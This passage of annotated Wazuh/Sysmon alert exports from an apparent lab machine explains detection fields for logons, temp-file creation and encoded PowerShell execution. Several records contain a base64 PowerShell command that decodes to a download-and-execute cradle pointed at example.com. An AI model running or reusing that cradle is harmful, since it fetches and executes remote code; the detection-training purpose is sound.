data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcee-680a-e70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11608
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:04.060+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:04.060+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  39
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534224.1207619
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:35.2004628Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282896
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:35.096 ProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00} ProcessId: 9396 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_loeo3cho.3ts.ps1 CreationUtcTime: 2025-04-24 22:36:35.096 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:35.096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf1-680a-e90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9396
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_loeo3cho.3ts.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:35.096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:37:04.713+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:04.713+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  52
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534224.1210384
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:37.6992031Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43836
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:05.033+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:05.033+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  36
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534225.1217719
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:39.0226447Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282962
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:36.380 ProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} ProcessId: 14892 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00} ParentProcessId: 9396 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:36.380
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf4-680a-eb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcf1-680a-e90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9396
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:05.111+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:05.111+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  40
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534225.1225786
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:39.2679536Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282973
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:39.228 ProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} ProcessId: 14892 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yre4dc4i.koa.ps1 CreationUtcTime: 2025-04-24 22:36:39.228 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:39.228
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf4-680a-eb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
